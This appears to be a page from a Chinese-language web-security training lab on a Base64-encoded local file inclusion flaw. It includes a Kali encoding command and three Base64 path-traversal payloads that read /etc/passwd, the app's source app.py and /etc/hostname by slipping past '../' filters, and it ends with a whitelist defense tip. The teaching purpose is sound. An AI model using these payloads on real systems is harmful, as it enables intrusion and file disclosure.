🔐 Base64 编码页面加载

参数 token 接收 Base64 编码的页面路径,解码后直接拼入文件路径

正常页面 (Base64): help about contact 🐛 攻击 (Base64): /etc/passwd app.py 源码 主机名
📄 请求: /vuln7/base64?token=YWJvdXQ= → 解码: about
<h2>ℹ️ 关于</h2>
<p>漏洞实验室 v1.0</p>
<p>一个用于 Web 安全教学与渗透测试实训的综合靶场。</p>
<p>已涵盖:密码泄露 | SQL注入 | 文件上传 | IDOR越权 | 文件包含</p>

💡 实验提示

Base64 编码可绕过对 ../ 等关键字符的字符串匹配过滤

编码方法:Kali 终端执行 echo -n "../../../../../etc/passwd" | base64 生成 Base64 载荷
POC 01:Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== → 解码后为 ../../../../../../etc/passwd
POC 02:Li4vYXBwLnB5 → 解码后为 ../app.py
POC 03:Li4vLi4vLi4vLi4vLi4vLi4vZXRjL2hvc3RuYW1l → 解码后为 ../../../../../../etc/hostname
⚠️ 防御要点:Base64 只是编码不是加密,不能替代输入校验。必须以白名单限制允许访问的文件。

← 返回 LFI 菜单